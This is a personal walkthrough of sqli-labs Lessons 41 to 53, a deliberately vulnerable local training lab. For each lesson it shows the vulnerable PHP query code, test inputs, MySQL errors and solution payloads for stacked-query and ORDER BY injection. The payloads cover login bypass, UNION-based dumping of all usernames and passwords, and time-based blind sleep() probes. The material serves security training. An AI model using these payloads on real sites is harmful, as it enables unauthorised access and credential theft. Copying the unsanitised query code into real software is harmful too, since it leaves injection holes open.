sqli-labs hands-on notes (Less 41 - Less 53)
The following is only a record I wrote while working through the sqli-labs exercises; it is for reference only. Since I had already learned some SQL injection before this, most entries come without explanation. If anything is unclear, please look it up with a search engine; you should find what you need.
Less - 41 Stacked Query Integer type blind
(Lesson 41: stacked queries, numeric type, blind)
Test:
http://localhost/sqli-lab/Less-41/index.php?id=1'
Note: the injected quote breaks the query, but no error message is displayed.
Source Code:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// id is concatenated unquoted, and mysqli_multi_query() accepts several
// ';'-separated statements, which is what makes this a stacked-query lesson
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        if($row = mysqli_fetch_row($result)){
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)) {
        // result sets of any further stacked statements are silently dropped
    }
}
Solution:
http://localhost/sqli-lab/Less-41/index.php?id=0 or 1=1 %23
Other payloads:
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,version(),database() %23
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 42 Stacked Query error based
(Lesson 42: stacked queries, error-based)
Test:
http://localhost/sqli-lab/Less-42/index.php
login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11''' at line 1    Note: password is wrapped in single quotes
Source Code:
// only the username is escaped; the password is concatenated raw
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)){
    /* store first result set */
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }else{
        // the raw MySQL error is echoed to the page: error-based lesson
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
}else{
    echo '<font size="5" color= "#FFFF00">';
    print_r(mysqli_error($con1));
    echo "</font>";
}
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login
Other payloads:
login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 43 Stacked Query String type
(Lesson 43: stacked queries, string type)
Test:
http://localhost/sqli-lab/Less-43/index.php
login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11'')' at line 1    Note: password is wrapped in single quotes inside parentheses
Source Code:
// only the username is escaped; the password is concatenated raw
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }else{
        print_r(mysqli_error($con1));
    }
}else{
    print_r(mysqli_error($con1));
}
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login
Other payloads:
login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 44 Stacked Query blind
(Lesson 44: stacked queries, blind)
Test:
http://localhost/sqli-lab/Less-44/index.php
login_user=admin&login_password=0'&mysubmit=login
Note: no error message is displayed.
Source Code:
// same query as Less 42, but with no error output at all
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }
}
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login
Other payloads:
login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 45 Stacked Query Blind based twist
(Lesson 45: stacked queries, blind, variant)
Test:
http://localhost/sqli-lab/Less-45/index.php
login_user=admin&login_password=0'&mysubmit=login
Note: no error message is displayed.
Source Code:
// same query as Less 43, but with no error output at all
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }
}
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login
Other payloads:
login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 46 ORDER BY-Error-Numeric
(Lesson 46: GET, error-based, numeric type, ORDER BY clause)
Test:
http://localhost/sqli-lab/Less-46/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1    Note: numeric type
http://localhost/sqli-lab/Less-46/index.php?sort=1+asc
http://localhost/sqli-lab/Less-46/index.php?sort=1+desc
Note: a quick check for ORDER BY injection is to append asc and then desc and compare whether the returned data changes order between the two.
Source Code:
// sort value is concatenated straight into ORDER BY (legacy mysql_* API)
$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
}else{
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-46/index.php?sort=1 and if(1=1, sleep(1), null)
Other payloads:
http://localhost/sqli-lab/Less-46/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-46/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 47 ORDER BY Clause-Error-Single quote
(Lesson 47: ORDER BY clause, error-based, single quote)
Test:
http://localhost/sqli-lab/Less-47/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1    Note: sort is wrapped in single quotes
Source Code:
$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
}else{
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-47/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Other payloads:
http://localhost/sqli-lab/Less-47/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-47/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 48 ORDER BY Clause Blind based
(Lesson 48: ORDER BY clause, blind)
Test:
http://localhost/sqli-lab/Less-48/index.php?sort=1'
http://localhost/sqli-lab/Less-48/index.php?sort=1"
http://localhost/sqli-lab/Less-48/index.php?sort=1')
http://localhost/sqli-lab/Less-48/index.php?sort=1")
Note: none of these displays an error message.
Source Code:
// as Less 46, but the error branch is gone: only timing remains as a signal
$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
}
Solution:
http://localhost/sqli-lab/Less-48/index.php?sort=1 and if(1=1, sleep(1), null)
Other payloads:
http://localhost/sqli-lab/Less-48/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-48/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 49 ORDER BY Clause Blind based
(Lesson 49: ORDER BY clause, blind)
Test:
http://localhost/sqli-lab/Less-49/index.php?sort=1'
Note: no error message is displayed.
http://localhost/sqli-lab/Less-49/index.php?sort=1"
Note: the page behaves normally; combined with the previous test, this shows sort is wrapped in single quotes.
Source Code:
$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['username'];
        echo $row['password'];
    }
}
Solution:
http://localhost/sqli-lab/Less-49/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Other payloads:
http://localhost/sqli-lab/Less-49/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-49/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 50 ORDER BY Clause Blind based
(Lesson 50: ORDER BY clause, blind)
Test:
http://localhost/sqli-lab/Less-50/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1    Note: numeric type
Source Code:
// same ORDER BY injection as Less 46, now through mysqli_multi_query(),
// so stacked statements are accepted as well
$sql="SELECT * FROM users ORDER BY $id";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}else{
    print_r(mysqli_error($con1));
}
Solution:
http://localhost/sqli-lab/Less-50/index.php?sort=1 and if(1=1, sleep(1), null)
Other payloads:
http://localhost/sqli-lab/Less-50/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-50/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 51 ORDER BY Clause Blind based
(Lesson 51: ORDER BY clause, blind)
Test:
http://localhost/sqli-lab/Less-51/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1    Note: sort is wrapped in single quotes
Source Code:
$sql="SELECT * FROM users ORDER BY '$id'";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}else{
    print_r(mysqli_error($con1));
}
Solution:
http://localhost/sqli-lab/Less-51/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Other payloads:
http://localhost/sqli-lab/Less-51/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-51/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 52 ORDER BY Clause Blind based
(Lesson 52: ORDER BY clause, blind)
Test:
http://localhost/sqli-lab/Less-52/index.php?sort=1'
http://localhost/sqli-lab/Less-52/index.php?sort=1"
http://localhost/sqli-lab/Less-52/index.php?sort=1')
http://localhost/sqli-lab/Less-52/index.php?sort=1")
Note: none of these displays an error message.
Source Code:
// as Less 50, with the error branch removed
$sql="SELECT * FROM users ORDER BY $id";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}
Solution:
http://localhost/sqli-lab/Less-52/index.php?sort=1 and if(1=1, sleep(1), null)
Other payloads:
http://localhost/sqli-lab/Less-52/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-52/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 53 ORDER BY Clause Blind based
(Lesson 53: ORDER BY clause, blind)
Test:
http://localhost/sqli-lab/Less-53/index.php?sort=1'
Note: no error message is displayed.
http://localhost/sqli-lab/Less-53/index.php?sort=1"
Note: the page behaves normally; combined with the previous test, this shows sort is wrapped in single quotes.
Source Code:
$sql="SELECT * FROM users ORDER BY '$id'";
if (mysqli_multi_query($con1, $sql)) {
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}
Solution:
http://localhost/sqli-lab/Less-53/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Other payloads:
http://localhost/sqli-lab/Less-53/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-53/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1